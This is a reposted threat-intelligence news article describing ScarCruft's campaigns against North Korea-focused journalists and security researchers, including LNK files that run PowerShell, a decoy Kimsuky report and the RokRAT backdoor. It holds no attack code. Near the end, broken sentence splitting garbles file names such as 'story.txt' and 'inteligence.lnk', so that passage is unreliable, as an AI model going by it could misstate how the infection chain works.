ScarCruft, the North Korea-sponsored advanced persistent threat group, is gearing up for targeted attacks on cybersecurity researchers and other members of the threat intelligence community - likely in a bid to steal nonpublic threat intel and improve its operational playbook.
According to an analysis from SentinelLabs, ScarCruft spent November and December targeting media organizations and think-tank personnel that focus on North Korean affairs, in a series of fairly typical impersonation-style attacks that researchers expect to continue into 2024.
While analyzing that campaign, SentinelLabs researchers came across new, in-development malware and some trial infection chains that suggest that a different type of offensive is in the offing.
Cyberattackers Target the Threat Intelligence Community This is not the first time that North Korean actors have targeted cybersecurity pros; but notably, the infection routine the attackers have been testing out is innovative in that it uses technical threat research on the North Korean APT known as Kimsuky as a lure.
The report is legit, published in October by Genians, a South Korean cybersecurity company - and calling out a fellow APT in such a way is a twist that appears to break new ground, according to Aleksandar Milenkoski, senior threat researcher at SentinelOne.
Cybersecurity Researchers Beware: ScarCruft Dangles Kimsuky Lure ScarCruft has a long history of targeted attacks against South Korean individuals, as well as public and private entities, and acts as a cyber-espionage specialist for the Democratic People's Republic of Korea.
To that end, in the active campaign that was originally the focus of SentinelLabs' analysis, ScarCruft repeatedly targeted the same individuals with the goal of delivering RokRAT, a custom backdoor developed by the adversaries that allows a range of surveillance types on targeted entities.
RokRAT is also at the center of the wave of cybersecurity pro targeting that's likely coming, according to the SentinelLabs report.
Both malicious LNK malwares execute PowerShell code when opened, which in turn extracts the decoy Kimsuky PDF document, and fetches a hex-encoded file named story.
Txt file benignly opens notepad.exe, indicating that inteligence.
Lnk has been developed for testing purposes, researchers explained.
While the approach is similar to campaigns in the wild that researchers have previously analyzed, it's clear that the group is fine-tuning and tinkering with its approaches.
Milenkoski advises cybersecurity researchers, especially those involved in examining the Korean threat landscape, to stay frosty and be on the lookout for cleverly designed, convincing email attacks going forward.
This Cyber News was published on www.darkreading.com. Publication date: Mon, 22 Jan 2024 20:45:05 +0000